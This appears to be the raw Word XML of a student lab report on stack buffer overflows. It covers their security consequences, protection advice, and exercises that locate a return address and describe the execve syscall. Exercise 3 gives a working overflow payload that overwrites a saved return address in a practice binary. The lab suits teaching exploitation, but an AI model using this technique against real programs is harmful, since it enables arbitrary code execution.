        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Consequences from security point of view:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Stack buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="384"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Category: Availability: Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="384"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Access control (instruction processing): Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program’s implicit security policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="384"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Other: When the consequence is arbitrary code execution, this can often be used to subvert any other security service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF74B7" w:rsidRDefault="00CF74B7" w:rsidP="00CF74B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF74B7" w:rsidRPr="00EA0C3D" w:rsidRDefault="00CF74B7" w:rsidP="00CF74B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Determine if we are vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>For server products and libraries, keep up with the latest bug reports for the products you are using. For custom application software, all code that accepts input from users via the HTTP request must be reviewed to ensure that it can properly handle arbitrarily large input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00EA0C3D" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How to Protect Yourself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA0C3D">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Keep up with the latest bug reports for your web and application server products and other products in your Internet infrastructure. Apply the latest patches to these products. Periodically scan your web site with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. For your custom application code, you need to review all code that accepts input from users via the HTTP request and ensure that it provides appropriate size checking on all such inputs. This should be done even for environments that are not susceptible to such attacks as overly large inputs that are uncaught may still cause denial of service or other operational problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What is the address of the &lt;call return_input&gt; instruction?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Check the assembly of return_input(). How much</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope is reserved for the array</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>? How much more will you need to reach stored EIP? You can find the reference to the array relatively to EBP in the format: 0x…(%EBP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disassemble main:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004A5FF1" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A5FF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F5BF939" wp14:editId="2674CAB6">
            <wp:extent cx="5506085" cy="1858645"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="6" name="Picture 6" descr="C:\Users\User\Desktop\Exerci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xercis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6085" cy="1858645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">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bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Address of call return_input</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">- 0x0804847d </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A5FF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-  0x804844d (Address of the caller where the Instruction pointer should point at the end of program)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00D227A6" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Space reserved for array: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x62</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>echo $(python -c 'print"\x41"*102+"\x4d\x84\x04\x08"')| ./valn_code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7418D981" wp14:editId="785D29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426FE3" w:rsidRPr="002205A7" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002205A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="00ED2AE5" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9438"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00ED2AE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Describe the syscall mechanism</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Compile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRDefault="003E46D2" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA5E02E" wp14:editId="6FB4FB89">
            <wp:extent cx="6479540" cy="3642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3642995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E46D2" w:rsidRDefault="003E46D2" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426FE3" w:rsidRPr="004768C4" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004768C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disassemble execve:</w:t>
      </w:r>
    </w:p>
